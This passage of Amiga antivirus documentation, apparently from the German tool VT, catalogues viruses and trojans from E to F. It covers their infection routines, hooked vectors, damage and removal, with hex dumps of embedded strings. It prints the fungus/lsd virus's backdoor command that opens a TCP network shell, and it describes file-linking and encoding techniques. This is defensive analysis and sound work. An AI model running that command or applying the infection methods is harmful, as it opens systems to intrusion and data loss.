?? File Hoechstens ein Trojan, deshalb die Fragezeichen. Laenge gepackt: 8168 Bytes Laenge entpackt: 12560 Bytes Keine verbogenen Vektoren Kein Virus VT bietet loeschen an. Entscheiden Sie bitte selbst. Im entpackten File ist zu lesen: 73616765 3a201a45 4f4c203c 736f7572 sage: .EOL <sour 63653e20 3c646573 74696e61 74696f6e ce> <destination 3e202d61 75746f64 65746563 74732077 > -autodetects w 68657468 65722069 6e736572 74206f72 hether insert or 2064656c 65746520 43522028 24304429 delete CR ($0D) 2957656c 636f6d65 20746f20 454f4c20 )Welcome to EOL ;..... 02224e5e 4e750943 6f6e4465 76696365 ."N^Nu.ConDevice Laut doc soll das Programm CR entfernen oder einsetzen. Nach Fremdaussagen geht das auch. ABER !!!!!! Mit SnoopDos ist nachweisbar, dass auch ein File ConDevice geloescht wird, falls vorhanden. ConDevice kenne ich NICHT. Es koennte also ein Schaden entstehen, falls dieses Teil fuer ein Programm wichtig ist. Bitte entscheiden Sie deshalb selbst. Oder es sagt mir jemand, fuer was ConDevice gut ist. Ich waere dankbar dafuer. - Ethik-Virus siehe bei SHIT ( ETIC ) Unter diesem Namen wurde mir ein BB zugeschickt. Aber auch im Speicher war dieser Name nicht nachvollziehbar. - EXCREMENT-Virus BB Cool: $7F47A DoIo: $7F4C2 immer ab: $7F400 KS2.06: GURU B nach Reset Fordert trackdisk.device NICHT Namensbegruendung: im BB ist zu lesen: 61727900 45584352 454d454e 54002d7c ary.EXCREMENT.-. Vermehrung: BB linke Maustaste= Abbruch und Cool-Vektor loeschen Test auf DOS-Kennung Test ob schon verseucht mit cmpi.l #"EXCR",$54(a4) Schaeden: Sobald eine Zaehlzelle den Wert $A erreicht hat, blinkt die LED. Mehr ist bei mir nicht passiert. Clones: Sentinel = USSR 492 - EXCREMENT-Installer File Laenge: 1180 Bytes VT erkennt EXCREMENT-Virus. Ein File das aus dem BB (s.o.) und ein paar Speicher-Install- Bytes besteht. Das Teil kann sich dann nur als BB und NICHT als File vermehren. Einfach loeschen. - Excreminator 1 File Laenge: 2392 Bytes auch KS2.04 KEINE verbogenen Vektoren KEINE Vermehrungsroutine KEINE Schreibroutine fuer Startup-Seq Versucht durch angeblichen Virustest zu taeuschen. Im File zu lesen: The Lame Trio usw. verraet sich durch System-Requester: Write-pro.... Schaeden: Versucht in libs Exec.library (4 Bytes) als Zaehlerfile (Startwert=5) anzulegen. Verringert dann bei jedem Aufruf den Zaehler. Bei 0 KopfStep ALLE Laufwerke Folge: Not a DOS Disk und mit DisplayAlert: LAME SUCKER usw... danach RESET Empfehlung: beide Files sofort loeschen und gegebenenfalls Startup-Seq. ueberpruefen. - EXECUTORS BB Cool $7EC74 DoIo $7ED4A im Speicher immer $7EC00 Herpes-Clone KS2.04: ja Vergleiche auch: Kimble.BB-Virus, CreepingEEL.BB-Virus Fordert trackdisk.device NICHT Namensbegruendung: s.u. Vermehrung: ueber BB Schaden: Zerstoert Track ab $6E000 (Bei DD-Disk = Root) Sobald eine Zaehlzelle den Wert 5 erreicht hat, wird ein Text ausgegeben: Hintergrund: Deutschland-Fahne HI ! THE EXECUTORS ARE HERE Some of your fucking Disks are infected with the Virus V1 Greets are going to : M A X O F S T A R L I G H T Lamer....FUCK OFF! - ExHacker-Trojan File Zerstoerung vgl. auch Trainer-Trojan Laenge gepackt: 18280 Bytes Nach FileID soll es ein Passwort-Hacker sein. VT bietet Loeschen an. Im entpackten File ist zu lesen: 6262733a 636f6e66 bbs:conf 636f6e66 69672e69 6e666f00 6262733a config.info.bbs: 75736572 2e646174 61006c69 62733a61 user.data.libs:a 65646f6f 722e6c69 62726172 79006c69 edoor.library.li 62733a42 6f6f7462 6c6f636b 2e6c6962 bs:Bootblock.lib 72617279 006c6962 733a6165 2e6c6962 rary.libs:ae.lib 72617279 006c6962 733a6578 706c6f64 rary.libs:explod 652e6c69 62726172 79006c69 62733a46 e.library.libs:F 696c6549 442e6c69 62726172 79004c69 ileID.library.Li 62733a66 72656561 6e696d2e 6c696272 bs:freeanim.libr 61727900 6c696273 3a696666 70617273 ary.libs:iffpars 652e6c69 62726172 79006c69 62733a72 e.library.libs:r 6571746f 6f6c732e 6c696272 61727900 eqtools.library. 6c696273 3a747261 6e736c61 746f722e libs:translator. 6c696272 61727900 6c696273 3a787072 library.libs:xpr 7a6d6f64 656d2e6c 69627261 72790073 zmodem.library.s 79733a70 72656673 2f546f6f 6c735072 ys:prefs/ToolsPr 65667300 733a7573 65722d73 74617274 efs.s:user-start 75700063 3a6c6f61 64776200 up.c:loadwb. Schaden: Die Files (siehe oben) sollen mit dosdelete geloescht werden. - EXORCIST Virus BB AlienNewBeat Clone siehe oben Es wurde der Text geaendert. Eine Meisterleistung Im BB ist zu lesen: 64206279 20746865 20534154 414e2076 d by the SATAN v 69727573 21202020 4469616c 20323233 irus! Dial 223 30343934 302c2061 6e642061 736b2066 04940, and ask f 6f722074 68652045 584f5243 49535421 or the EXORCIST! Anderer Name: SATAN-Virus - Express2.20-Virus keine Vermehrung (also von Def. kein Virus) keine verbogenen Vektoren, Zerstoerungsprogramme 1. File Express2.20 Laenge: 194064 2. File aibon Laenge: 776 aibon haengt am Ende von Express2.20 und wird mit jmp ange- sprungen. Am Ende der Files ist zu lesen bbs: sys: ram: dos.library . Naja werden Sie denken wieder mal gegen Ami-Express gerichtet. Trifft mich nicht, hab ja keine Mail-Box. Halt !!!! Vorsicht ! Das Starten von Express2.20 reicht um Sie an die Decke gehen zu lassen. Zerstoerungsablauf: - Sie starten Express2.20 von Sys-Ebene (halt mal sehen was das Programm macht) - aibon wird nach :s kopiert - :s/startup-sequence wird auf EINE Zeile :s/aibon gekuerzt - Requester Datentraeger bbs einlegen - Sie haben keine Mailbox und klicken cancel - Tastatur wird gesperrt - und jetzt gehts los - jedes File in sys: wird eingelesen und mit 42 Bytes Laenge zurueckgeschrieben. Da kommt Freude auf. - Also Tastatur-Reset (geht leider nicht siehe oben) - Also nehmen Sie not validated in Kauf und schalten schnell den Computer 1 Minute aus. - Computer wieder an UND es wird weiter geloescht (richtig: sys:s/startup-sequence mit der Zeile :s/aibon existiert noch) Das merken Sie aber erst so nach 40 Sekunden, weil ihre startup-sequence fuer die Festplatte immer eine Zeit braucht. - Um hier noch etwas zu retten brauchen Sie eine WB-Disk von der Sie booten koennen und im Zweifelsfalle ihre Festplatte anmelden zu koennen. Kopieren Sie auf ihre Festplatte eine neue startup-sequence und hoffen Sie, dass Sie schnell genug waren und einige Files noch nicht zerstoert wurden. Nachtrag: Falls bbs: gefunden wurde, werden natuerlich zuerst dort alle Files zerstoert. Herkunft: d-aex220.lha Laenge 135400 angeblich neues Ami-Express Erkennung der beiden Files mit VT getestet: 09.09.92 Loeschen der beiden Files mit VT getestet : 09.09.92 aibon: 00000000 00000000 00006262 733a0073 ..........bbs:.s 79733a00 72616d3a 00646f73 2e6c6962 ys:.ram:.dos.lib Ein weiteres bekanntes File: acp.ctrl Laenge: 56016 Bytes Enthaelt am Ende ebenfalls aibon Nachtrag 01.05.93: Es ist ein aibon 2 aufgetaucht. Verhalten siehe oben. Install-File Laenge ungepackt: 1872 Bytes aibon 2 Laenge: 784 Bytes Besonderheit: Install-File sucht zuerst nach Portnamen: ser.read aibon 2 neu: df0, df1 : 00007379 733a0062 62733a00 6466303a ..sys:.bbs:.df0: 00646631 3a00646f 732e6c69 62726172 .df1:.dos.librar Nachtrag 02.05.93: Es ist ein File DwEditV1.62 verseucht mit aibon2 aufgetaucht. FileLaenge verseucht: 43700 Bytes aibon2 ausgebaut : 41468 Bytes aibon2 wurde mit hunklab angelinkt. Waehlen Sie bitte Ausbau. Die Lauffaehigkeit des sauberen Files wurde getestet. Schaeden siehe oben - Aibon2-Mount2-Clone: Es ist ein Toolsdaemon V2.2 aufgetaucht, verseucht mit diesem Cloneteil. FileLaenge verseucht: 7128 Bytes Trojan ausgebaut : 4896 Bytes Dieses Teil wurde mit der Hunklab-Methode angelinkt. VT bietet Ausbau an. Unterschiede zu Aibon: - mount wird nach s kopiert (Laenge 784 Bytes) - s:startup-sequence wird auf EINE Zeile s:mount,$0a,$0a gekuerzt. - Files werden auf 42 Bytes gekuerzt und mit Speicherinhalt ab $0 (ja Zero-Page) gefuellt. Beispiel-File mit KS1.3: 0000: 00000000 00000676 00fc0818 00fc081a .......v........ 0010: 00fc081c 00fc081e 00fc0820 00fc0822 ........... ..." 0020: 00fc090e 00fc0826 00fc .......&.. Oder es entstehen Files mit Inhalt Null (Beispiel war setpatch): SetPatch 0000: 00000000 00000000 00000000 00000000 ................ 0010: 00000000 00000000 00000000 00000000 ................ 0020: 00000000 00000000 0000 .......... - Im Trojan-File ist zu lesen: 00000000 00000000 00000000 7379733a ............sys: 00686430 3a006466 303a0064 66323a00 .hd0:.df0:.df2:. 646f732e 6c696272 61727900 00000000 dos.library..... ;..... 03eb0000 00000000 03f2733a 6d6f756e ..........s:moun 740a0a73 3a737461 72747570 2d736571 t..s:startup-seq 75656e63 6500733a 6d6f756e 74000000 uence.s:mount... ;..... 00000000 00006864 303a0073 79733a00 ......hd0:.sys:. 72616d3a 00646f73 2e6c6962 72617279 ram:.dos.library 00736572 2e726561 6400646f 732e6c69 .ser.read.dos.li 62726172 79000000 00000000 0000646f brary.........do 732e6c69 62726172 79004261 636b4772 s.library.BackGr 6f756e64 5f50726f 63657373 00000000 ound_Process.... Also auch kleinere Aenderungen bei den Laufwerken. VT sucht nach dem Process und versucht eine Abschaltung. Mit einem GURU muss gerechnet werden. Der Install-Process besitzt ein Dos-Delay ($29bf8 = fast eine Stunde) . Rest siehe oben bei Express-Beschreibung. - EXTREME BB DoIo, KickTag, KickCheckSum, Rasterstrahl entweder 7f800 oder ff800, da Berechnung ueber SysStkLower+$1000 lesbarer Text im BB: THE EXTREME ANTIVIRUS usw. sobald Zaehlzelle Null : Zerstoeren (Disk BAD) aller nicht schreibgeschuetzten Disks in allen LW und Alertmeldung Vermehrung: ueber BB Clone: FAT2-Virus, ZACCESS 3, PRIMAVERA, - F.A.S.T. Cool, DoIo , FreeMem, immer ab $7F000 Alertmeldung (verschluesselt mit eori-Byte in Abhaengigkeit von $DFF006) und loeschen veraendert auch $C0-$E0 (SetPatchListe!) Vermehrung: BB FAST-Clone: Im BB wurde der codierte Prg.Teil um einige Bytes verschoben, um im BB-Kopf dos.library einbauen zu koennen. Die Lage im Speicher wurde nicht veraendert. Bekannte Spruenge: 6018, 6030, 6042 - F.I.C.A Beginio, KickTag, KickCheckSum, SumKickData Vermehrung: BB Besonderheit: spielt sauberen BB vor sichtbarer Text im BB ab $288 z.B. F.I.C.A RULES! - F.I.C.A-VIRI-Clone Nur Text geaendert: 57686174 20646f65 73207468 69732073 What does this s 61793f20 56697269 20617265 20746865 ay? Viri are the 206b696e 6773206f 66206c61 6d657273 kings of lamers - FA58B1EF-LVirus Link Fileverlaengerung: #2440 Bytes Verbogene Vektoren: LoadSeg, NewLoadSeg Verbogene Vektoren manchmal: BeginIo von scsi.device Namensbegruendung: s.u. KS1.3: nein Speichereinbindung: Ueber LoadSeg und NewLoadSeg Dabei wird ueber das Langwort $FA58B1EF (s.o.) ueberprueft, ob das Teil im Speicher schon aktiv ist. Link an ein File: Medium valid File ausfuehrbar (3F3) Filelaenge mind. #30000 Bytes $4AFC wird nicht gefunden (z.B. libs) File noch nicht verseucht (Test mit FA58B1EF) Ueberlaeuft 3e8-, 3F1-Hunks usw. Das Teil linkt sich als neuer 1.Hunk vor den Original-1.Hunk. Deshalb muss das Teil auch die Relocs der folgenden Hunks ver- aendern. VT versucht das Teil auszubauen und auch die Reloc-Hunks zurueck- zusetzen. VT sollte das Teil im Speicher finden und abschalten. Schaden1: - durchlaeuft die Deviceliste ($15e) und fuehrt haeufig (nicht immer) den Schwachsinn addq.b #1 (a0)+ aus. Mit VT ausgelesen Liste vorher: Adresse Ver Rev NegOff PosOff Pri# OCnt Name Anzahl: 12 Datum $0800d514 37 12 36 338 0 1 gameport.device (3.5.91) $0800d6ac 39 4 68 380 0 24 timer.device (29.7.92) ;usw ... Mit VT ausgelesen Liste nachher: Adresse Ver Rev NegOff PosOff Pri# OCnt Name Anzahl: 6 Datum $0900d514 55355535 65535 65535 - 1 5535 $ffffffff 07523498 26112 63498 0 2288 ;usw .... Da ist NICHTS mehr zu retten !!!! Fuehren Sie einen Reset durch. Oder Schaden2: - Suche nach scsi.device und verbiegen von BeginIo fuer scsi.device ist im Virusteil jeder Buchstabe im 1 niedriger abgelegt, also rbrh-cduhbd . Daher wahrscheinlich der add-Schwachsinn s.o. . Gewartet wird auf einen Schreibaufruf. Mit VT Block ausgelesen vorher: 0180: 00000000 00000000 00000000 00000000 ................ ;.... 01e0: 00000000 00000000 00000000 00000000 ................ Mit VT Block ausgelesen nachher: 0180: 00000000 00000000 0000ff00 000000ff ................ ;.... ^^ ^^ 01e0: 00000000 0000ff00 00000000 00000000 ................ ^^ Ich habe natuerlich fuer den Test einen leeren Block gewaehlt. So ein zerstoerter Block kann von VT nicht gefunden werden. Sollte der Block zu einem File gehoeren, so ist auch das File verloren. Vernuenftig waere es also, nachdem VT dieses Virusteil im Speicher gefunden hat, von einer sauberen Antivirusdisk neu zu booten. - Fast Eddie Virus BB starke Aehnlichkeit mit Glasnost Block 2 u 3 KickTag, KickCheckSum KS2.04 nein im Prg noch DoIo, $6c, im Speicher immer $7F000 fordert trackdisk.device NICHT. Im BB ist an $1c FE91 zu lesen Wird aktiv wenn Block 880 gelesen wird Schaeden: blockiert nach 15 oder 20 Min. Rechner (Farbspiel) schreibt eigenen BB bestimmt einen Block ueber $DFF006 durch mulu #6,d7 und schreibt in diesen Block ab $100 Fast Eddie . Dieser Block kann NICHT gerettet werden. Benennt Disknamen um ( This disk is infected (HE-HE) ) . Codiert jeden BB neu mit ByteWert von $DFF006 eor.b d1,(a0)+ . Decodiert eigenen BB mit eor.b d6,(a0)+ . Decodiert im Speicher : Call 43-444304 and ask for HENRIK HANSEN (FAST EDDIE) siehe auch Clone INFECTOR - Fastcall-Trojan anderer Name DMS206-Trojan s.o. - FAT 1 Virus BB TimeBomb V1.0 BB-Virus-Clone siehe unten anderer Name: The FAT Stinkbomb 1 Nur Text geaendert. Eine Meisterleistung Im BB und Speicher ist zu lesen: 14535449 4e4b424f 4d422120 4665642e .STINKBOMB! Fed. 20416761 696e7374 20546f78 69642057 Against Toxid W 61737465 20677265 65747320 46656974 aste greets Feit 652d546f 6d210001 00000000 42b90007 e-Tom!......B... Dieser Text wird auch fuer DisplayAlert verwendet. - FAT 2 Virus BB EXTREME-Clone siehe oben anderer Name: The FAT Stinkbomb 2 Nur Text geaendert. Eine Meisterleistung Im BB und Speicher ist zu lesen: 696f6e2e 6c696272 61727900 00b01546 ion.library....F 20412054 202d2046 65642e20 41676169 A T - Fed. Agai 6e737420 546f7869 64205761 73746521 nst Toxid Waste! - FCheck Virus File BYTEPARASITE III - Clone s.o. - FEARS2-Demo (L) NON-DOS-Disk Cold, Cool KEIN Virus Empfehlung: Loeschen Soll nach Reset Teile des Fears2-Speichers ueberschreiben. - FileGhost-Inst. File anderer Name: HardSpeeder Laenge ungepackt: 8160 Bytes Typ A Laenge ungepackt: 8116 Bytes Typ B Sowohl Typ A als auch B schreiben 876 Bytes Linklaenge. Versucht durch Text zu taeuschen: 6d486172 64537065 65646572 20a92062 mHardSpeeder . b 79204368 72697374 69616e20 4e65756d y Christian Neum 616e6e2e 0a506174 63682069 6e737461 ann..Patch insta Auch in dem beiliegenden Doc.File Macht angeblich HD schneller und ist deshalb besonders fuer Sysops geeignet. Verbogene Vektoren: Forbid, LoadSeg, NewLoadseg In Wirklichkeit wird der FileGhost-Virus s.u. im Speicher verankert. VT bietet loeschen an. - FileGhost-Virus Link KS2.04 : ja KS3.0 : ja bekannter Installer: HardSPEEDER 8160 Bytes Verlaengert ein File um 876 Bytes. Haengt sich hinter den ersten Hunk. Verbogene Vektoren: Forbid, Loadseg, NewloadSeg Das VirusTeil ist teilweise codiert mit: eor.b d0,(a0)+ Der Wert von d0 wird vom VirusPrg. staendig geaendert (Forbid) und ist deshalb bei jedem Link neu. Namensbegruendung: im Speicher ist zu lesen: 732e6c69 62726172 79004869 20467269 s.library.Hi Fri 656e6421 20446f6e 60742077 6f727279 end! Don`t worry 2e2e2e20 49746073 206f6e6c 79207468 ... It`s only th 65204669 6c654768 6f73742e 00000bf8 e FileGhost..... Das Virusteil meldet sich nie. Vermehrungsroutine: - max. Filelaenge #100000 Bytes - File ausfuehrbar - Disk validated - mind. 8 Block frei - RTS wird gefunden (max. loop $3e (+1) ) - RTS wird ersetzt durch bra.s oder NOP - FileGhost-2-Virus Link KS2.04 : ja KS3.0 : ja bekannter Installer: HardSpeeder2 8116 Bytes Verlaengert ein File um 796 Bytes. Haengt sich hinter den ersten Hunk. Verbogene Vektoren: Loadseg Falls es einen Installer gab, so wird der noch gesucht. Das VirusTeil ist teilweise codiert mit: add.b x,(a0)+ Der Wert von x wird vom VirusPrg. staendig geaendert ($DFF006) und ist deshalb bei jedem Link neu. Namensbegruendung: im Speicher ist zu lesen: e638646f 732e6c69 62726172 79002046 .8dos.library. F 696c6547 686f7374 2032202d 204d6572 ileGhost 2 - Mer 72792058 2d4d6173 20616e64 20612068 ry X-Mas and a h 61707079 206e6577 20796561 722e2e2e appy new year... Das Virusteil meldet sich nie. Vermehrungsroutine: - max. Filelaenge #100000 Bytes - File ausfuehrbar - Disk validated - mind. 8 Block frei - RTS wird gefunden (max. loop $3e (+1) ) - RTS wird ersetzt durch bra.s oder NOP Ueberlaueft 3E8,3F0,3F1-Hunks usw. !!!!! VT2.68 sollte das Teil im Speicher finden. VT2.68 sollte das Teil ausbauen koennen. Hinweis 1 Okt.94: Es ist ein verseuchtes muchmore (18012) aufgetaucht: 0020: 000003e9 000000c9 4ef90000 00000000 ^^^^ 1.Hunk ^^^^ JMP 0030: 48e7fffe ^^^^ Virusbeginn Der Sprungbefehl bra.s (600x) in den Virusteil kommt aber im Orig-Hunk gar nicht vor. So kann sich das Teil gar nicht linken d.h. es draengt sich die Vermutung auf, dass das Virusteil von Hand FALSCH eingefuegt wurde. Ich habe laenger mit dem ver- seuchten und dem ausgebauten Teil "geuebt". Das verseuchte Teil KANN das Virusteil NICHT im Speicher aktivieren, da mit einem JMP darueber hinweggesprungen wird. Das unverseuchte File konnte NIE verseucht werden. VT erkennt dieses File jetzt auch und bietet nach einer Warnung (BRA.S FEHLT), den Ausbau an. Falls es noch mehrere Files dieser Art gibt, bitte ich um einen Hinweis. Danke Hinweis 2 Okt.94: Das Virusteil scheint mehr Verbreitung gefunden zu haben, als von mir angenommen wurde. Die aelteste mir bekannte befallene Disk stammt vom Juli 94. Ich vermute, dass dieses Teil so lange unentdeckt bleiben konnte, da auch viele sogenannte Nutzprogramme LoadSeg verbiegen. Der User ist also nicht mehr gewarnt, wenn er einen verbogenen LoadSeg-Vektor sieht. Wahrscheinlich ein Nutzprogramm, denkt er. PECH gehabt. Ich warne dringend vor solchen Programmen, da fuer LoadSeg KEINE Verkettung existiert, ist es UNMOEGLICH das Virus- teil zu finden, wenn LoadSeg von einem Nutzprogramm noch einmal verbogen wird !!!!!! Hinweis 3 Okt.94: Es sind einige verseuchte Spiele-Files aufgetaucht, die entgegen den Commodore-Richtlinien NICHT mit 3F2 aufhoeren. Bei fehlender 3F2-Endekennung, geht man normalerweise davon aus, dass das File defekt ist. Es handelt sich hierbei um Absicht von Seiten der Programmierer. VT unternimmt auch hier einen Ausbauversuch (Warntext: 3F2 Fehlt), der zu einem lauffaehigen Spiel fuehren kann nach dem Ausbau. Genausogut kann es sich aber auch um ein wirklich defektes File handeln. Fertigen Sie bitte vor dem Aus- versuch eine Kopie an. Danke - FileGhost-3-Virus Link KS1.3 : nein KS2.04 : ja KS3.0 : ja Verlaengert ein File um 1288 Bytes. Haengt sich hinter den ersten Hunk. Verbogene Vektoren: Loadseg Nicht resetfest Das VirusTeil ist codiert mit: eori.b x,(a0) eor.b d1,(a0)+ Der Wert von x wird vom VirusPrg. staendig geaendert ($DFF006) und ist deshalb bei jedem Link neu. d1 aendert sich mit der Schleife. Ich habe SEHR HAEUFIG bei Tests den GURU gesehen und auch Files mit der Laenge 0 erhalten. Vermehrungsroutine: - Filename enthaelt nicht "." oder "-" - max. Filelaenge #125000 Bytes - min. Filelaenge #2500 Bytes - File ausfuehrbar - Disk validated - mind. 8 Block frei - RTS wird gefunden ( max. loop $3e ) - RTS wird ersetzt durch bra.s oder NOP Ueberlaueft 3E8,3F0,3F1-Hunks usw. !!!!! Dieses Teil soll sich ab und zu melden, indem unterschiedliche Texte in die Fensterleiste geschrieben werden. Hab ich nie ge- sehen. Es kam immer vorher der GURU. "AUA! schlag nicht so auf die Tasten!" "FileGhost3 - the nightmare continues!" "Hallo DEPP!" "Was machst Du denn als nächstes ?" "Weißt Du eigentlich, daß Du dumm bist ?" "Und schon wieder eine Datei weniger!" "Gib mir mal `n Bier!" "Tötet alle Nazis + RAPER!" "AMIGA kills PC! (HEHE)" "INTeL Outside !" Eine Nachprogrammierung, die bei den Aenderungen FALSCH ist. Vermutlich ein Anfaenger. Da sehr schnell der GURU kommt, duerfte das Teil sehr schnell gefunden werden. Falls sehr viele Files im c-Verzeichnis befallen sind, sollten Sie ueberlegen, ob es nicht schneller geht, wenn Sie das Ver- zeichnis loeschen und von einer Original-WB neu aufspielen. Bei einer Disk sollten Sie nach mehreren Ausbauten copy df0: df1: all durchfuehren, um die Fragmentierung zu verringern. Arbeiten Sie bitte immer mit einer Kopie. - FileShield-Link N KEIN Virus !!!!!! mehrere Versionen Vor ein File wurde ein kurzer Hunk mit einem Sprung und ein paar RTS gelinkt. Sollte nach dem Ausbau ein unbekannter Cruncher erkennbar werden, so sollten Sie vorsichtig werden. Es existiert fuer das Anlinken ein Programm. - Firedom.BB Virus Cascade-Virus-BB-Clone s.o. Nur Text geaendert: (im BB lesbar) 00004669 7265646f 6d205631 2e344320 ..Firedom V1.4C Rest: siehe oben - Firedom.BB-Inst. File Laenge: 3428 Bytes Mit der Hunklab-Bootjob-Methode wurde der BB an den c-Befehl install angelinkt. 42.5 (3.3.94) ??????? Hunklab-Bootjob s.u. Die Wahrscheinlichkeit, dass ein LAUFFAEHIGER BB entsteht, ist gering. VT bietet Ausbau an. - Fl96Intro-Troj. siehe bei tdtj-Trojan - FLASHBACK-Virus BB Block 0-3 Glasnost-Clone s.u. Unterschiede: In Block 3 ist uncodiert zu lesen: 464c4153 48424143 4b207669 72757320 FLASHBACK virus 62792053 54432120 5765276c 6c206265 by STC! We'll be 20626163 6b2e2e00 00000000 00000000 back........... Schreibt in Block, der zerstoert wird ab $100 STC! Block: 1494 00f0: 75657374 65727320 20202020 20202020 uesters 0100: 53544321 53544321 53544321 53544321 STC!STC!STC!STC! 0110: 20202020 20202020 20202020 20202020 Dieser Block kann leider NICHT gerettet werden. Das File ist verloren. Lesen Sie bitte bei Glasnost nach. - FlowerPower-Trojan Zerstoerung siehe bei ZINKO Trojan - FORPIB BB kein FastMem, BeginIo, KickTag, KickCheckSum, Vec5 Vermehrung: ueber BB besorgt sich Speicher ueber MemList, Speicher fuer neuen VirusBB mit AllocMem Im BB sichtbar: - FORPIB - 09.88 - N° 197102 - usw. Clone: STARCOM 6, TAI3 siehe unten - Freedom reines Zerstoerungsprogramm Laenge: 10876Bytes Herkunft: Freedom!.LZH 8153 Bytes Fordert trackdisk.device; keine verbogenen Vektoren versucht durch Text zu taeuschen: Freedom ! by Steve Tibbett Checking df0: for 126 viruses nach kurzer Zeit wird abwechselnd ausgegeben: SADDAM-Virus removed ! oder SMILY CANCER-Virus removed ! Schaden: schreibt in jeden 5.Block (also auch Root=880) Datenmuell, der nach einigen Tracks sogar den Inhalt wechselt (vermutlich soll Blockerkennung verhindert werden). Durch die vielen zerstoerten Bloecke ist eine Rettung mit DiskSalv unwahrscheinlich. Daten also ab- schreiben und Disk formatieren. Mit etwas Glueck erkennt VT beim BitMapTest eine Freedom-Disk. Beim BlockITest meldet sich VT nicht, da der Muell von Disk zu Disk und auch nach einigen Tracks wechselt. - French.BB-Virus BB Es ist KEIN Virus. Lesen Sie bitte nach bei VT-andere.BB unter CCI-Intro.BB . Danke - FrenchKiss belegt auf Track 0 Block 0 bis 5 Ich besitze nur Bl 0 u. 1 . Ein echter Virus !!! Cool, DoIo, $6c, Vec5, immer ab $7f0d0 Vermehrung: Block 0 bis 5 auf Track 0 Schaeden: Je nach Zaehlerstand wird Track 0 ueberschrieben oder Track 80 (bei Disk = Dir ) zerstoert. Mehr kann ich nicht sagen, da ich nur Block 0 u. 1 habe. Bitte schicken Sie mir Ihre verseuchte Disk. Danke !!! - FRESHMAKER-Virus BB immer ab $78000 Cool $78154 Nach Reset dann noch: DoIo, Findres, Supervisor Vermehrung nur: mit KS1.3, da absolute ROM-Einspruenge und ExecBase im Speicher ab $C00000 Versucht durch lesbaren Text im BB zu taeuschen: 203E2056 69727573 50726F74 6563746F > VirusProtecto 72205631 2E30203C 2000 r V1.0 < Nach #10 Vermehrungen Textausgabe mit intuition. Text wird mit eori.b #$27,(a1)+ decodiert: ES IST WIRKLICH NICHT ZU GLAUBEN. DU BOOTEST MIT EINER UNGESCHÜTZTEN DISK ! ES IST WIRKLICH SCHADE (!), DAß ES SOLCHE LAMER (!) NOCH GIBT. DU HAST WOHL KEINE ANGST VOR VIREN ??? ICH WÜNSCHE DIR NOCH VIEL SPAß (!) MIT DEINEM AMIGA... UNTERZEICHNET: THE FRESHMAKER IN 1991 ! - Frity Forpib-Clone s.o. - FUCK-Virus siehe bei MODEMCHECK-Virus - fuck.device-Virus BB Cool, DoIo Namensbegruendung: siehe unten Fordert trackdisk.device NICHT Das Virusteil meldet sich nicht. Schaeden und Vermehrung: je nach dem Wert in der Zaehlzelle wird: - der Virus-BB geschrieben (#1024 Bytes) - oder Block 0 und 1 zerstoert mit fuck.device. Da hier aber $800 Bytes geschrieben werden, wird in Block 2 und 3 Speicher- muell geschrieben. Sollte ein File Block 2 und 3 belegt haben, so ist dieses File NICHT mehr zu retten. 6675636b 2e646576 69636500 00667563 fuck.device..fuc 6b2e6465 76696365 00006675 636b2e64 k.device..fuck.d 65766963 65000066 75636b2e 64657669 evice..fuck.devi Kopieren Sie mit VT einen neuen DOS-BB auf. - fungus/lsd-LVirus Linkvirus moegliches Ausloeser-Archiv: M31H_CRK.LHA in diesem Archiv das File: Mui.MiamiGui #127360 Bytes Namensbegruendung: Im decodierten LinkTeil ist zu lesen: 01ea536e 6f6f7044 6f732053 7570706f ..SnoopDos Suppo 72742050 726f6365 7373003e 3e66756e rt Process.>>fun 6775735c 6c73643c 3c007275 6e203e4e gus\lsd<<.run >N 494c3a20 6e657773 68656c6c 20544350 IL: newshell TCP 00313636 360043fa 01d42851 220c74fe .1666.C...(Q".t. Fileverlaengerung: #760 Bytes Nicht Resetfest Verbogene Vektoren: LoadSeg Speicherverankerung: - Test ob schon im Speicher ($261F) - Suche nach SnoopDos - Loadseg wird verbogen Linkvorgang: - mit LoadSeg - Medium validated - 3 Block frei - letztes Langwort im 1.Hunk enthaelt RTS (Problem s.u.) z.B. sehr viele Befehle im c-Verzeichnis - RTS wird zu NOP Falls RTS an vorletzter Stelle, dann 2x NOP - Link hinter den 1.Hunk - das Teil codiert sich mit EOR Zusatz: Das Teil versucht mit DosExecute run >NIL: newshell TCP auszufuehren. Falls VT das Teil im Speicher findet, sollten Sie vielleicht besser Internetzugriffe vermeiden, bis Sie ihre Files alle gesaeubert haben. Ausbauprobleme: letztes Langwort: a) vor Virus: wxyz4e75 nach Virus: wxyz4e71 nach VT-Ausbau: wxyz4e75 also kein Problem b) vor Virus: 4e750000 nach Virus: 4e714e71 nach VT-Ausbau: 4e750000 also kein Problem c) vor Virus: 4e754e71 nach Virus: 4e714e71 nach VT-Ausbau: 4e750000 d) vor Virus: 4e714e75 nach Virus: 4e714e71 nach VT-Ausbau: 4e750000 e) vor Virus: 4e75wxyz nach Virus: 4e714e71 nach VT-Ausbau: 4e750000 Fall c-e ist keine Originalrettung moeglich, da nicht erkannt werden kann, welches NOP (4e71) durch RTS (4e75) ersetzt werden muss. Das Virusteil nimmt hier auch keine Rettung vor. Fall c und d sind harmlos, da ein NOP vor oder nach RTS, die Lauffaehigkeit des Programms nicht beeinflussen duerfte. Fall e: wxyz, also eine Zahl nach RTS. Falls diese Zahl im Original-Programm nie verwendet wird, laeuft das Programm. Falls ABER ein Programmierer hier eine Zaehlzelle angelegt haette, dann waere das Programm NICHT lauffaehig. Aber auch das verseuchte File war NICHT MEHR lauffaehig. Vergleiche auch STD-Viren Nachtrag: Es ist ein Anti-fungus-Tool aufgetaucht, das nur ein RTS setzt, das Linkteil aber nicht entfernt. Falls VT so ein File sollte ein Requester "NOP fehlt" auftauchen, aber trotzdem der Ausbau angeboten werden. Nachtrag: Stand Ende Sept. 98 WARNUNG WARNUNG WARNUNG WARNUNG WARNUNG Testbedingungen: 68040warp ROM 40.68 32MB Fast 2MB Chip NoCache KEIN nachzuladendes File befindet sich im Speicher Fungus-Virus aktiv im Speicher Start des Antivirus-Prgs von WB von Festplatte Einige Antivirusprogramme laden beim Start nach. Viele diese Files z.B. in Libs: , xfd: usw. wurden von Fungus VERSEUCHT beim Nach- laden. Es scheint erst danach ein Speichertest zu erfolgen. Oder kann erst nach dem Nachladen erfolgen, weil erst JETZT die Viren- signaturen bekannt sind ???????? Die Tests wurden mehrfach wiederholt (auch kleinere Prozessoren) . Leider war IMMER eine Fungusverseuchung festzustellen. Etwas vorsichtig geworden habe ich andere Viren (NICHT ALLE aus dem Pool) probiert. Bei einigen Viren (nicht bei allen getesteten Viren) ist EBENFALLS eine 